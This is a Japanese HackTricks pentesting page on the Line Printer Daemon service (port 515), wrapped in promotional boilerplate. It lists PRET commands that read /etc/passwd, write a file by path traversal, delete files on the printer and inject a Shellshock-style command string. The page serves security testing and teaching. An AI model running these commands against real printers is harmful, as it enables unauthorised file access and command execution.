hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をご覧ください！

HackTricksをサポートする他の方法:

• HackTricksにあなたの会社を広告掲載したい場合やHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください。
• 公式PEASS & HackTricksグッズを入手する
• The PEASS Familyを発見し、独占的なNFTsコレクションをチェックする
• 💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦 @carlospolopmでフォローする。
• HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。

Line Printer Daemon (LPD) プロトコルは元々80年代のBerkeley Unixで導入されました（後にRFC1179によって規定されました）。
デーモンは515/tcpポートで実行され、lprコマンドを使用してアクセスできます。印刷するには、クライアントはジョブ/ユーザー名を定義するコントロールファイルと、印刷される実際のデータを含むデータファイルを送信します。データファイルの入力タイプは、様々なファイル形式の中からコントロールファイルで設定できます。しかし、印刷データの実際の処理方法はLPDの実装次第です。Unix系オペレーティングシステムのための人気なLPD実装にはLPRngがあります。LPDは、悪意のあるPostScriptやPJLプリントジョブを展開するためのキャリアとして使用されることがあります。

lpdprintとlpdtestツールはPRETに含まれています。これらはLPD対応プリンターに直接データを印刷したり、ファイルのダウンロード/アップロード/削除などを行うための最小限の方法です：

lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local

プリンターのハッキングについてもっと学びたい場合は、このページを読んでください。

Shodan

• port 515

AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をチェックしてください！

HackTricksをサポートする他の方法:

• あなたの会社をHackTricksに広告掲載したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください！
• 公式のPEASS & HackTricksグッズを手に入れましょう。
• The PEASS Familyを発見してください。私たちの独占的なNFTコレクションです。
• 💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦 @carlospolopmをフォローしてください。
• HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有してください。